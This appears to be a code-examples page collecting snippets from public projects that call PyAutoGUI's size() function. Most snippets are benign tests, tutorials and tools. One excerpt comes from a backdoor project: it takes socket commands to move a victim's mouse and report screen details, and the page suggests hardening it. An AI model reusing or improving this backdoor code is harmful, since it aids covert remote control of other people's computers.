How to use the pyautogui.size function in PyAutoGUI

To help you get started, we’ve selected a few PyAutoGUI examples based on popular ways the library is used in public projects.

github asweigart / pyautogui / tests / test_pyautogui.py (View on GitHub)
def test_onScreen(self):
        zero = P(0, 0)  # P is the point helper defined in this test file
        xone = P(1, 0)
        yone = P(0, 1)
        size = P(*pyautogui.size())
        half = size / 2

        on_screen = [zero, zero + xone, zero + yone, zero + xone + yone, half, size - xone - yone]
        off_screen = [zero - xone, zero - yone, zero - xone - yone, size - xone, size - yone, size]

        for value, coords in [(True, on_screen), (False, off_screen)]:
            for coord in coords:
                self.assertEqual(
                    value,
                    pyautogui.onScreen(*coord),
                    "onScreen({0}, {1}) should be {2}".format(coord.x, coord.y, value),
                )
                self.assertEqual(
                    value,
                    pyautogui.onScreen(list(coord)),
                    "onScreen([{0}, {1}]) should be {2}".format(coord.x, coord.y, value),
                )

github DFO-Ocean-Navigator / Ocean-Data-Map-Project / tests / frontend_tests / ui_tests.py (View on GitHub)
def find_temperature_bar():
    """

    Function to locate the temperature bar on
    the ocean navigator public page. 
    
    """
    time.sleep(2)
    screenWidth, screenHeight = gui.size()
    # Go to the navigator web page
    #navigator_webpage()
    # Locate temperature color bar on public page 
    image_loc = gui.locateCenterOnScreen(
        paths['test_temperature'], confidence=0.7, grayscale=True)

    if image_loc is None:
        gui.alert(text='Temperature bar not found!', title='Temperature bar', button='OK')
    else:
        gui.click(button='right', x=image_loc.x, y=image_loc.y)
        gui.alert(text='Temperature bar check complete!', title='Temperature bar', button='Close', timeout=box_timeout)
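One caveat with the call above: the confidence keyword to locateCenterOnScreen only works when OpenCV is installed; without it, pyscreeze (which PyAutoGUI delegates to) rejects the argument.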

github angus-y / PyIris-backdoor / payloads / lin_injection_payload.py (View on GitHub)
            s.sendall('[+]Injected right mouse click' + End)
        elif injection_type == 'move_to':
            if not arg:
                s.sendall('[-]Supply X and Y coordinates as an arg'+End)
                return
            try:
                arg = arg.split(' ')
                cord_one = int(arg[0])
                cord_two = int(arg[1])
                pyautogui.moveTo(x=cord_one, y=cord_two)
                s.sendall('[+]Injected mouse movement' + End)
            except (IndexError, ValueError):
                s.sendall('[-]Input X and Y coordinates as integers' + End)
                return
        elif injection_type == 'dimensions':
            dimensions = pyautogui.size()
            dimensions = '[+]Dimensions of screen : ' + str(dimensions[0]) + ' x ' + str(dimensions[1])
            s.sendall(dimensions + End)
        elif injection_type == 'position':
            current = pyautogui.position()
            current = '[+]Current mouse position : ' + str(current[0]) + ' x ' + str(current[1])
            s.sendall(current + End)
        else:
            s.sendall('[-]Unknown command "' + injection_type + '", run "help" for help menu' + End)
    except Exception as e:
        s.sendall('[-]Error injecting keystrokes : ' + str(e))
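A hardening this move_to handler could borrow from size(): clamp remote-supplied coordinates to the visible screen before moving. A minimal sketch, with a helper name of our own invention:

import pyautogui

def clamp_to_screen(x, y):
    # Hypothetical helper, not part of the payload above: pin the
    # requested point inside the primary display reported by size().
    width, height = pyautogui.size()
    return min(max(x, 0), width - 1), min(max(y, 0), height - 1)

pyautogui.moveTo(*clamp_to_screen(5000, -20))  # lands on the nearest screen edge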

github chaodengusc / Dota2_ai_bot / dota_model.py (View on GitHub)
def __init__(self, view):
    self.view = view
    self.width, self.height = pg.size()

github eClarity / skill-autogui / __init__.py (View on GitHub)
def handle_screen_res_intent(self, message):
        screen = pyautogui.size()
        resx = screen[0]
        resy = screen[1]
        responsex = num2words(resx)
        responsey = num2words(resy)
        self.speak("Your screen resolution is %s by %s" % (responsex, responsey))

github mozilla / iris_firefox / iris / api / core / screen.py (View on GitHub)
import logging

import mss
import pyautogui

from region import Region

logger = logging.getLogger(__name__)


class Screen(Region):
    def __init__(self, screen_id=0):
        """Function assign value to the '_screen_id' and '_screen_list' Screen parameters."""
        self._screen_id = screen_id
        # mss lists the virtual "all monitors" box at index 0; real displays start at index 1.
        self._screen_list = [item for item in mss.mss().monitors[1:]]
        Region.__init__(self, get_screen_details(self._screen_list, self._screen_id))

    SCREEN_WIDTH, SCREEN_HEIGHT = pyautogui.size()
    screen_region = Region(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT)

    TOP_HALF = Region.screen_regions(screen_region, 'TOP_HALF')
    BOTTOM_HALF = Region.screen_regions(screen_region, 'BOTTOM_HALF')

    LEFT_HALF = Region.screen_regions(screen_region, 'LEFT_HALF')
    RIGHT_HALF = Region.screen_regions(screen_region, 'RIGHT_HALF')

    TOP_THIRD = Region.screen_regions(screen_region, 'TOP_THIRD')
    MIDDLE_THIRD_HORIZONTAL = Region.screen_regions(screen_region, 'MIDDLE_THIRD_HORIZONTAL')
    BOTTOM_THIRD = Region.screen_regions(screen_region, 'BOTTOM_THIRD')

    LEFT_THIRD = Region.screen_regions(screen_region, 'LEFT_THIRD')
    MIDDLE_THIRD_VERTICAL = Region.screen_regions(screen_region, 'MIDDLE_THIRD_VERTICAL')
    RIGHT_THIRD = Region.screen_regions(screen_region, 'RIGHT_THIRD')
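The pairing above is deliberate: pyautogui.size() only reports the primary display, so the class leans on mss, whose monitors list covers every attached screen, to build per-monitor regions.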

github EvilPort2 / final-year-project / modules / gesture_recognition / gesture_action.py (View on GitHub)
def gesture_action():
	with open("range.pickle", "rb") as f:
		t = pickle.load(f)
	print(t)
	hsv_lower = np.array([t[0], t[1], t[2]])  # HSV lower bound
	hsv_upper = np.array([t[3], t[4], t[5]])  # HSV upper bound
	screen_width, screen_height = gui.size()
	#camx, camy = 480, 360

	c2, c1 = 0, 0
	flag_do_gesture = 0
	flags = [False, False, False]  # flags for number of coloured objects found (flag0, flag1, flag2)
	buff = 500
	line_pts = deque(maxlen = buff)
	line_pts1 = deque(maxlen = buff)
	line_pts2 = deque(maxlen = buff)
	created_gesture_hand = []
	created_gesture_hand_left = []
	created_gesture_hand_right = []
	count_stop_left = 0 
	count_stop_right = 0 
	count_stop = 0 
	old_center_left = [0, 0]

github vprusso / youtube_tutorials / web_scraping_and_automation / pyautogui_mouse_controller.py (View on GitHub)
import pyautogui

# Depending on your program, pyautogui can "go rogue". As a failsafe,
# you can halt a runaway script by moving the mouse to the upper left
# corner of the screen after setting the following:
pyautogui.FAILSAFE = True

# The location of the mouse cursor is provided as an (x, y) pair.
# The values of x and y are determined by the resolution of your
# monitor. My resolution is 2720x1024. For example:
#   The top right corner of my screen is (2720, 0),
#   the bottom left corner of my screen is (0, 1024),
#   etc.

# You can obtain the dimensions of your own computer screen here:
print(pyautogui.size())

# Moving the mouse to a specific location:
pyautogui.moveTo(100, 100, duration=0.25)

# Moving the mouse to specific locations (in a loop):
# Try running this program, but then also try moving the
# mouse up and to the left to see the result of the failsafe
# we previously enabled. 
for i in range(10):
    pyautogui.moveTo(100, 100, duration=0.25)
    pyautogui.moveTo(200, 100, duration=0.25)
    pyautogui.moveTo(200, 200, duration=0.25)
    pyautogui.moveTo(100, 200, duration=0.25)
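
# Note: with FAILSAFE enabled, dragging the cursor into the top-left
# corner raises pyautogui.FailSafeException and halts the script.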

# Move the mouse relative to its current position:
# Run this line a couple of times to see the effect.

github SouravJohar / Gesture-Recognition / SRC / Python / Gesture Recognition v1.2 / src / Gesture.Recognition.v1.2.withConsole.py (View on GitHub)
def setup():
        f = open(r"\\VBOXSVR\Code\HandRecData.txt", "w")
        f.write("")
        screenWidth, screenHeight = gui.size()  # needed for mouse control